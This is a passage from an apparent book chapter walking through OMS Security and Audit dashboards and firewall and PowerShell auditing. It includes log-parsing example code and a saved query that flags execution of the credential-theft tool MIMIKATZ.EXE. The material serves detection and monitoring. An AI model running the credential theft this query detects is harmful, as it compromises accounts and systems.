    2. Malicious Communication. Lists any communication with malicious IPs (botnets, malware, darknets, etc.) happening on your servers. These should be investigated regularly. Inbound communication can signal attacks or probes made towards your servers and applications; outbound communication signals that you may have compromised servers in your environment.
    3. Top Active Computers. Lists the servers with the most traffic and sessions.
    4. Top Destinations. Lists the IPs with which your servers have communicated most frequently.
  6. Click on the pie chart of Malicious communications, as shown in Figure 42.

FIGURE 42. MALICIOUS IPS DATA

  7. The query will provide more information on the malicious IPs that are communicating with servers in your environment.
  8. Review which fields are available specifically for Malicious IP.
  9. Review the query that was generated to list the data.

Note: Malicious IP data is inserted for Wire Data logs, IIS logs, Windows Firewall logs and Common Security Logs. These logs are scanned on a regular interval and if any inbound or outbound communication is found with a malicious IP, additional data is inserted into the records of those logs. That additional data is represented with fields like MaliciousIP, IndicatorThreatType, TLPLevel, Confidence, IsActive, etc.
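To make the enrichment described in this note and in the Security and Audit overview concrete, here is an added Ruby example (not code from the page, from OMS or from Microsoft) that parses a constructed Windows Firewall log, matches the public peer address of each record against a constructed indicator list standing in for the MSTIC feed, and attaches the fields named above (MaliciousIP, IndicatorThreatType, TLPLevel, Confidence, IsActive). The private-range check, the Direction field derived from the log's path column, and all sample addresses and indicator values are assumptions of the example.

```ruby
require 'ipaddr'

# Constructed sample of a Windows Firewall log (pfirewall.log layout); not real traffic.
FIREWALL_LOG = <<~LOG
  #Version: 1.5
  #Software: Microsoft Windows Firewall
  #Time Format: Local
  #Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
  2017-05-10 10:15:01 ALLOW TCP 10.0.0.5 203.0.113.77 49823 443 0 - 0 0 0 - - - SEND
  2017-05-10 10:15:03 ALLOW TCP 198.51.100.23 10.0.0.5 51000 3389 0 - 0 0 0 - - - RECEIVE
  2017-05-10 10:15:04 DROP UDP 10.0.0.5 10.0.0.1 53 53 0 - - - - - - - SEND
  2017-05-10 10:15:09 ALLOW TCP 10.0.0.5 192.0.2.10 49824 80 0 - 0 0 0 - - - SEND
LOG

# Constructed indicator feed standing in for the MSTIC list that OMS pulls hourly.
INDICATORS = {
  '203.0.113.77'  => { threat_type: 'Botnet',  description: 'C2 node (constructed)', tlp: 'Green', confidence: 80, active: true },
  '198.51.100.23' => { threat_type: 'Darknet', description: 'Scanner (constructed)', tlp: 'Amber', confidence: 60, active: true }
}.freeze

# RFC 1918 and loopback ranges; the page says only public peers are matched.
PRIVATE_RANGES = %w[10.0.0.0/8 172.16.0.0/12 192.168.0.0/16 127.0.0.0/8].map { |c| IPAddr.new(c) }.freeze

def public_ip?(ip)
  addr = IPAddr.new(ip)
  PRIVATE_RANGES.none? { |range| range.include?(addr) }
rescue IPAddr::InvalidAddressError
  false
end

# Turns the W3C-style log into one Hash per record, keyed by the names in the #Fields header.
def parse_firewall_log(text)
  fields = nil
  text.each_line.with_object([]) do |line, records|
    line = line.strip
    if line.start_with?('#Fields:')
      fields = line.sub('#Fields:', '').split
    elsif !line.empty? && !line.start_with?('#') && fields
      values = line.split
      records << fields.zip(values).to_h if values.size == fields.size
    end
  end
end

# Adds the Malicious IP fields to every record whose public peer appears in the feed.
def enrich_with_indicators(records, indicators)
  records.map do |rec|
    peer = [rec['src-ip'], rec['dst-ip']].find { |ip| public_ip?(ip) && indicators.key?(ip) }
    next rec unless peer
    ind = indicators[peer]
    rec.merge(
      'MaliciousIP'         => peer,
      'IndicatorThreatType' => ind[:threat_type],
      'Description'         => ind[:description],
      'TLPLevel'            => ind[:tlp],
      'Confidence'          => ind[:confidence],
      'IsActive'            => ind[:active],
      # Assumed convention: the log's path column (SEND/RECEIVE) gives the direction.
      'Direction'           => rec['path'] == 'RECEIVE' ? 'Inbound' : 'Outbound'
    )
  end
end

# What the Malicious Communication dashboard would list for this sample.
def malicious_communications(text = FIREWALL_LOG, indicators = INDICATORS)
  enrich_with_indicators(parse_firewall_log(text), indicators).select { |r| r.key?('MaliciousIP') }
end

if __FILE__ == $PROGRAM_NAME
  malicious_communications.each do |r|
    puts "#{r['date']} #{r['time']} #{r['Direction']} #{r['MaliciousIP']} #{r['IndicatorThreatType']} (confidence #{r['Confidence']})"
  end
end
```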

4 Identity and Access

The Identity and Access security domain leads to a group of dashboards that can immediately assist you in identifying potentially suspicious activities. By monitoring your identity-related activities, you will be able to take proactive steps before an incident takes place, or reactive actions to stop an attack attempt.

Execute the steps below to explore Identity and Access dashboards:

  1. Browse to the OMS portal at https://www.mms.microsoft.com.
  2. On the Overview page, click on Security and Audit tile.
  3. Click on Identity and Access tile.
  4. Another set of dashboards will load, as shown in Figure 43.

FIGURE 43. IDENTITY AND ACCESS DASHBOARDS

  1. The dashboards are divided into 3 groups.
    1. Identity Posture. General information like the percentage of failed vs. successful logins, successful and failed login trends, locked accounts, accounts with changed/reset passwords, etc.
    2. Failed Logins. Breaks down the reasons for failed logins and which accounts have the most failed logins.
    3. Logons over time. Breaks down failed and successful logins per computer.
  2. From the Failed Logins group, you can easily identify accounts against which a brute-force attack has been attempted.
  3. When you click on an account from the list, you will be redirected to Search for more data, as shown in Figure 44.

FIGURE 44. FAILED LOGINS - AZURE ACCOUNT

  1. In Figure 44 you can find out which computers are being targeted. All the data for these dashboards comes from Windows Security event log events, which are stored as type SecurityEvent.

5 Computers

This tile can be used to access the number of computers that are reporting with the different security log types, as shown in Figure 45.

FIGURE 45. NUMBER OF COMPUTERS BY SECURITY LOGS

To view a better summary of security data by computer, execute the following steps:

  1. Browse to the OMS portal at https://www.mms.microsoft.com.
  2. On the Overview page, click on Search.
  3. Execute the query below. Type=SecurityEvent | measure count() by Computer
  4. Click on Computer Security view, as shown in Figure 46.

FIGURE 46. COMPUTER SECURITY VIEW

You can use this view to get a quick security summary per computer.

6 Threat Intelligence

This tile is a shortcut to the Threat Intelligence dashboard. Threat Intelligence takes advantage of the Malicious IP information and visualizes the data on an interactive map, as shown in Figure 47.

FIGURE 47. THREAT INTELLIGENCE DASHBOARD

When you click on the map on malicious incoming or outgoing traffic, you will get additional information, such as an overview of the threat and sometimes even a link to a full report, as shown in Figure 48.

FIGURE 48. THREAT INTELLIGENCE REPORT

Additionally, you can zoom in and out on the map, and click on the results in the threat breakdown dashboard group or the threat details group. Malicious IP data is produced the same way as explained earlier in this chapter.

7 Baseline Assessment

The Baseline Assessment tile leads to the Security Baseline Assessment dashboard.

Microsoft, together with industry and government organizations worldwide, defines a Windows configuration that represents highly secure server deployments. Such a configuration is represented by registry keys, audit policy settings, and security policy settings, together with the values Microsoft recommends for them on the Windows operating system. This set of rules is known as a Security baseline. The Security and Audit solution has all this information and scans your computers for the state of these settings.

Note: Security Baseline Assessment currently works on Windows Server 2008 R2 and above. Support for Linux is planned for a future release, as described at https://blogs.technet.microsoft.com/msoms/2016/08/12/use-oms-security-to-assess-the-security-configuration-baseline/.

Execute the steps below to explore the Security Baseline Assessment feature:

  1. Browse to the OMS portal at https://www.mms.microsoft.com.
  2. On the Overview page, click on Security and Audit tile.
  3. Click on Baseline Assessment tile.
  4. Another set of dashboards will load, as shown in Figure 49.

FIGURE 49. SECURITY BASELINE ASSESSMENT DASHBOARDS

  1. The dashboards are divided into 3 groups.
    1. Computers compared to baseline. This group gives a summary of the computers assessed and their average pass score. You will also get the 10 computers with the lowest pass score.
    2. Required rules status. This group focuses on the failed rules. You can see a summary of the failed rules by severity and type. You will also get the top 10 failed rules.
    3. Computers missing baseline assessment. This group lists the computers that were not assessed due to operating system incompatibility or failures.
  2. Click on the Computers Assessed tile to get more detailed information.
  3. As shown in Figure 50, there will be a list of computers and the percentage of rules each of them passed.

FIGURE 50. SECURITY BASELINE ASSESSED COMPUTERS

  1. Change the query to Type=SecurityBaselineSummary, as shown in Figure 51. As you can see, there is a summary of information about the rules for every computer. This information is stored in the SecurityBaselineSummary type and is collected every 24 hours.

FIGURE 51. SECURITYBASELINESUMMARY TYPE

  1. Return to Security Baseline Assessment dashboards.
  2. Click on one of the failed security rules.
  3. As shown in Figure 52 you will notice that Security Baseline Rules have their own custom view for easier viewing.

FIGURE 52. SECURITY BASELINE RULE VIEW

  1. From Figure 52, you can find all the information about this rule like full description, potential impact, countermeasures, vulnerability, the setting for the rule, expected value for compliance and what is the default value.
  2. Click on List and expand the first record, as shown in Figure 53.

FIGURE 53. FAILED SECURITY BASELINE RULE

  1. Security Baseline rule results are recorded as type SecurityBaseline. You can see the information about the rule on each computer where it failed. Note that you can see both the expected setting and the actual setting on the computer. Every rule is assessed on a 24-hour interval. You will notice that different rules are assessed at different times of the day to avoid affecting operating system performance.

Azure Automation Configuration Management can be used for applying these rules and making sure there is no drift from the desired configuration. The Security and Audit solution will make sure you are compliant with all the baseline rules. Once a computer becomes compliant with a rule, this will be reported in the security baseline summary for that computer upon the next scan.

8 Azure Security Center

The Azure Security Center tile is just a shortcut to Security Center in Azure portal.

Notable Issues

Notable issues help you identify potential issues in your environment. Each issue is assigned and grouped by severity, as shown in Figure 54.

FIGURE 54. NOTABLE ISSUES DASHBOARD

There are 3 types of severities: Critical, Warning and Info. Some of these issues are already covered in the different dashboards of the Security and Audit solution; this dashboard visualizes the most important ones. Behind each notable issue there is a query that is executed when the dashboard is loaded. These queries are saved in 3 saved search categories, as shown in Figure 55.

FIGURE 55. NOTABLE ISSUES QUERIES

The Notable issues dashboard is extensible. If you save a query in one of those 3 saved search categories and the query returns results, it will show up in the dashboard list.

Execute the steps below to add a Notable issue:

  1. Browse to the OMS portal at https://www.mms.microsoft.com.
  2. On the Overview page, click on Search.
    1. Enter and execute query: Type=SecurityEvent Process="MIMIKATZ.EXE".

Note: In order to get results, AppLocker auditing must be configured and MIMIKATZ.exe must have been run on a computer.

  1. Click on Save from Top menu, as shown in Figure 56.
  2. For the name, enter MIMIKATZ was executed and for category enter Security Critical Notable Issues, as shown in Figure 56.

FIGURE 56. ADDING NOTABLE ISSUE

  1. Click Save.
  2. Open Security and Audit dashboards.
  3. The added notable issue will appear in the dashboard, as shown in Figure 57.

FIGURE 57. ADDED NOTABLE ISSUE

You can extend this dashboard with queries that target other log types that are not part of the Security and Audit solution.

Detections

Detections is a feature that analyzes the security events and looks for patterns that indicate a threat. On the backend, it uses advanced analytics and techniques like behavioral analysis. As a cloud solution, the built-in security detection logic is updated constantly with new attack patterns. The full list of detections is not disclosed, to protect the customers using the solution. Detections are stored in the SecurityDetection type. All detections generated by the Security and Audit solution or by the Microsoft Advanced Threat Analytics (ATA) integration will appear in the Detections dashboard, as shown in Figure 58.

FIGURE 58. DETECTIONS DASHBOARD

Note: This feature relies heavily on configuring AppLocker policies and enabling security event 4688 with the process command line field. The process command line field is available from Windows Server 2012 R2 and Windows 8.1 onwards. More information can be found at https://technet.microsoft.com/en-us/itpro/windows/keep-secure/event-4688

As the list of detections is not disclosed, it is hard to simulate a detection. There are a few known detections, like masking an exe file with a double extension, as shown in Figure 59.

FIGURE 59. SUSPICIOUS DOUBLE EXTENSION FILE DETECTION

Threat Intelligence

Threat Intelligence is the same feature described earlier. In this group, you have quick access to the world map with the incoming and outgoing malicious traffic, as well as some breakdowns of the threats, as shown in Figure 60.

FIGURE 60. THREAT INTELLIGENCE GROUP DASHBOARDS

Advanced Audit Scenarios

The capabilities in Log Analytics, like Log Management, can be used to provide auditing on other services that are not available out of the box in Security and Audit. In this section, we will show how we can provide auditing for Windows Firewall configuration and PowerShell.

Note: When you set up these advanced scenarios, their usage will count against the Insights & Analytics offering when per-node licensing is chosen.

Audit Windows Firewall Configuration

Follow these steps to configure and use Windows Firewall Configuration auditing.

  1. Browse to the OMS portal at https://www.mms.microsoft.com.
  2. Go to Settings.
  3. Click on the Data tab. Choose Windows Event logs.
  4. Under Collect events from the following event logs, enter Microsoft-Windows-Windows Firewall With Advanced Security/Firewall and click on the plus sign to add.
  5. Check the Error, Warning, and Information checkboxes for that log, as shown in Figure 61. Click Save to save your changes.

FIGURE 61. ADDING WINDOWS FIREWALL LOG

  1. Wait for 10 to 20 minutes until this configuration is distributed to the machines connected to OMS.
  2. Logon to a server connected to OMS.
    1. Start the Windows Firewall with Advanced Security console, as shown in Figure 62.

FIGURE 62. WINDOWS FIREWALL WITH ADVANCED SECURITY CONSOLE

  1. Click on Inbound rules.
  2. Select and right-click on a rule like COM+ Remote Administration and Enable it.
  3. Browse to the OMS portal at https://www.mms.microsoft.com.
  4. Click on Log Search.
  5. In the Search bar, type the query below and press Enter.

Type=Event EventLog="Microsoft-Windows-Windows Firewall With Advanced Security/Firewall" EventID=2005

  1. A log entry with the rule that was modified in step 10 will appear, as shown in Figure 63.

FIGURE 63. WINDOWS FIREWALL CONFIGURATION LOG

  1. The data can be extended with the custom fields feature for better searching.
  2. Click on the hamburger menu in front of Parameter 'XML value' and select extract fields from 'Event', as shown in Figure 64.

FIGURE 64. EXTRACT FIELDS

  1. On the Extract Fields page select the value for Rule name, as shown in Figure 65.

Give a name to the field, like FirewallRuleName_CF and click Extract.

FIGURE 65. EXTRACT FIREWALL RULE NAME FIELD

  1. Click Save Extraction.
  2. Repeat steps 16 to 18, but this time selecting the user value, as shown in Figure 66, and giving a name like User_CF to the field.

FIGURE 66. EXTRACT FIREWALL RULE USER FIELD

  1. These newly created fields will be populated on new data only.
  2. Wait 10 minutes, log on to the same server from step 7 and disable the rule from step 10.
  3. Browse to the OMS portal at https://www.mms.microsoft.com.
  4. Click on Log Search.
  5. In the Search bar, type the query below and press Enter.

Type=Event EventLog="Microsoft-Windows-Windows Firewall With Advanced Security/Firewall" EventID=2005

  1. A log for the disabled rule should appear with the custom fields populated, as shown in Figure 67. The created custom fields can be used for scoping or aggregating the audit data for Windows Firewall Configuration.

FIGURE 67. CUSTOM FIELDS POPULATED

You can extract more fields from the same log. For example, you can extract whether the rule was enabled or disabled by the modification: the Active field has the value 1 when the rule is enabled and 0 when it is disabled.
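As an added example that is not part of the original chapter, the PowerShell below reads the same event ID 2005 records directly from a server's event log and pulls out the three values the steps above expose as custom fields (rule name, modifying user, Active flag). It assumes the EventData element names RuleName, ModifyingUser, ModifyingApplication and Active from the event's XML; check them against one event on your own system before relying on the output.

```powershell
# Added example, not from the original chapter: local parsing of Windows Firewall
# rule-change events (ID 2005) into the fields the chapter extracts in OMS.
# Assumption: the EventData element names are RuleName, ModifyingUser,
# ModifyingApplication and Active (verify against one event's XML).
$FirewallLog = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall'

function Get-FirewallRuleChange {
    param([int]$MaxEvents = 200)

    Get-WinEvent -FilterHashtable @{ LogName = $FirewallLog; Id = 2005 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
    ForEach-Object {
        [xml]$xml = $_.ToXml()
        # Flatten the <Data Name="...">value</Data> elements into a hashtable
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

        # ModifyingUser may be recorded as a SID; resolve it to DOMAIN\name when possible
        $user = $data['ModifyingUser']
        if ($user -match '^S-1-') {
            try { $user = ([System.Security.Principal.SecurityIdentifier]$user).Translate([System.Security.Principal.NTAccount]).Value } catch { }
        }

        [pscustomobject]@{
            TimeCreated   = $_.TimeCreated
            Computer      = $_.MachineName
            RuleName      = $data['RuleName']
            ModifyingUser = $user
            ModifyingApp  = $data['ModifyingApplication']
            # Active is '1' when the rule is enabled after the change, '0' when disabled
            Enabled       = ($data['Active'] -eq '1')
        }
    }
}

# Rule changes not made by the SYSTEM account, newest first: the same view the
# chapter builds in Log Search with the FirewallRuleName_CF and User_CF fields
Get-FirewallRuleChange |
    Where-Object { $_.ModifyingUser -notlike '*\SYSTEM' } |
    Sort-Object TimeCreated -Descending |
    Format-Table TimeCreated, Computer, RuleName, ModifyingUser, Enabled, ModifyingApp -AutoSize
```

Running this on a server before the OMS collection is configured confirms that the firewall log actually produces 2005 events for rule changes, so an empty Log Search result later can be attributed to collection rather than to auditing.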

Audit PowerShell

PowerShell can be audited with Log Analytics through some simple steps. As a result, you will be able to see what PowerShell commands are executed in your environment and by whom.

Follow these steps to audit PowerShell.

  1. Log on to an Active Directory domain controller in your environment.
  2. Start the Group Policy Management console.
  3. Expand the Group Policy Object folder.
  4. Right-click on Default Domain Policy and select Edit.
  5. Expand Computer Configuration, Policies, Administrative Templates, Windows Components, Windows PowerShell.
  6. Double-click on Turn On Module Logging policy.
  7. Select the Enabled option.
  8. Click on the Show button.
  9. In the empty field enter *, as shown in Figure 68. Click OK and OK again to complete.

Note: The * character enables audit logs for all PowerShell commands. If you want to enable logging for specific PowerShell modules only, you can enter the names of the modules instead, such as ActiveDirectory.

FIGURE 68. TURN ON MODULE LOGGING POLICY

  1. Repeat steps 4 to 9 for the Default Domain Controllers Policy.
  2. Close the Group Policy Management Editor.
  3. Wait until the policy is applied to all servers.
  4. Browse to the OMS portal at https://www.mms.microsoft.com.
  5. Click on Settings.
  6. Click on Data tab. Choose Windows Event logs.
  7. Under 'Collect events from the following event logs' enter Microsoft-Windows-PowerShell/Operational and click on the plus sign to add.
  8. Check Error, Warning, and Information for that log, as shown in Figure 69. Click Save to save your changes.

FIGURE 69. ADDING POWERSHELL AUDIT LOG

  1. Wait 10 to 20 minutes until this change is distributed to the OMS-connected machines.
  2. Log on to a server connected to OMS.
  3. Execute a PowerShell command such as Get-Command.
  4. Browse to the OMS portal at https://www.mms.microsoft.com.
  5. Click on Log Search.
  6. Type the query below in the Search bar and press Enter.

Type=Event EventLog="Microsoft-Windows-PowerShell/Operational" EventID=4103

  1. This query will return PowerShell audit logs, as shown in Figure 70.

FIGURE 70. POWERSHELL AUDIT LOGS

  1. The data can be extended with the custom fields feature for better searching.
  2. Click on the hamburger menu in front of Parameter XML value and select extract fields from 'Event', as shown in Figure 71.

FIGURE 71. EXTRACT FIELDS

  1. On the Extract Fields page, select the value for User, as shown in Figure 72. Give the field a name like PowerShellUser_CF and click Extract.

FIGURE 72. EXTRACT FIELDS

  1. Click Save Extraction.
  2. Repeat steps 25 to 27, but this time selecting the Command Name value, as shown in Figure 73, and giving a name like PowerShellCommand_CF to the field.

FIGURE 73. EXTRACT POWERSHELL COMMAND FIELD

  1. If needed, correct some of the results, as shown in Figure 74.

FIGURE 74. FINE-TUNING EXTRACTION

  1. Correct extraction should look like the results shown in Figure 75.

FIGURE 75. CORRECT EXTRACTION

  1. These newly created fields will be populated on new data only.
  2. Log on to an OMS-connected server and execute several PowerShell commands.
  3. Browse to the OMS portal at https://www.mms.microsoft.com.
  4. Click on Log Search.
  5. In the Search bar, type the query below and press Enter. Note that we are excluding the system user for more granular results.

Type=Event EventLog="Microsoft-Windows-PowerShell/Operational" EventID=4103 PowerShellUser_CF!="CLOUDADMINISTRA\\SYSTEM" | measure count() by PowerShellUser_CF

  1. The query will return results with the number of commands each user has executed, as shown in Figure 76.

FIGURE 76. NUMBER OF POWERSHELL COMMANDS PER USER

  1. In the Search bar, type the query below and press Enter.

Type=Event EventLog="Microsoft-Windows-PowerShell/Operational" EventID=4103 PowerShellUser_CF!="CLOUDADMINISTRA\\SYSTEM" | measure count() by PowerShellCommand_CF

  1. The query will return results with how many times a PowerShell command has been executed, as shown in Figure 77.

FIGURE 77. POWERSHELL COMMAND EXECUTION COUNT

  1. When we click on 'Restart-Computer' result we can see who has executed that command, as shown in Figure 78.

FIGURE 78. RESTART-COMPUTER COMMAND LOG
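As an added example, not part of the original chapter, this PowerShell reads the ID 4103 module-logging events on a server and builds the same two summaries as the queries above (commands per user and executions per command, excluding the SYSTEM account) without going through OMS custom fields. It assumes the ContextInfo block of a 4103 event contains "Command Name = ..." and "User = ..." lines, which is the text the chapter's custom fields are extracted from.

```powershell
# Added example, not from the original chapter: local aggregation of PowerShell
# module-logging events (ID 4103), mirroring the chapter's two OMS queries.
# Assumption: ContextInfo holds "Key = Value" lines including "Command Name" and "User".
$PowerShellLog = 'Microsoft-Windows-PowerShell/Operational'

function Get-PowerShellAudit {
    param([int]$MaxEvents = 500)

    Get-WinEvent -FilterHashtable @{ LogName = $PowerShellLog; Id = 4103 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
    ForEach-Object {
        [xml]$xml = $_.ToXml()
        $context = ($xml.Event.EventData.Data | Where-Object Name -eq 'ContextInfo').'#text'

        # Turn each "Key = Value" line of ContextInfo into a hashtable entry;
        # the lazy [^=]+? keeps any '=' inside the value with the value
        $fields = @{}
        foreach ($line in ($context -split "`r?`n")) {
            if ($line -match '^\s*([^=]+?)\s*=\s*(.*)$') { $fields[$Matches[1]] = $Matches[2].Trim() }
        }

        [pscustomobject]@{
            TimeCreated = $_.TimeCreated
            Computer    = $_.MachineName
            User        = $fields['User']
            Command     = $fields['Command Name']
            HostApp     = $fields['Host Application']
        }
    }
}

# Exclude the SYSTEM account, as the chapter does with PowerShellUser_CF!="...\SYSTEM"
$audit = Get-PowerShellAudit | Where-Object { $_.User -and $_.User -notlike '*\SYSTEM' }

# Equivalent of: ... | measure count() by PowerShellUser_CF
$audit | Group-Object User | Sort-Object Count -Descending |
    Select-Object @{ n = 'User'; e = { $_.Name } }, Count | Format-Table -AutoSize

# Equivalent of: ... | measure count() by PowerShellCommand_CF
$audit | Group-Object Command | Sort-Object Count -Descending |
    Select-Object @{ n = 'Command'; e = { $_.Name } }, Count | Format-Table -AutoSize

# Who ran a specific command, as in Figure 78 for Restart-Computer
$audit | Where-Object Command -eq 'Restart-Computer' |
    Format-Table TimeCreated, Computer, User, HostApp -AutoSize
```

Because module logging is driven by the policy set earlier, an empty result here means the policy has not applied to this server yet; the same check on a server that does produce events confirms the log is worth collecting before the OMS configuration is changed.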

Summary

Security is a topic that every person in an organization should be concerned about. Preventing or stopping a security breach is key for the success of your organization.

In this chapter, we have demonstrated the Security and Audit solution in OMS. We have shown how to configure it and take full advantage of its features, integrations, and extensibility in protecting and auditing your organization. We hope you will use the hands-on examples provided in this chapter and continue further exploration of the service in the context of security. In the next chapter, we will explore Protection and Recovery in OMS.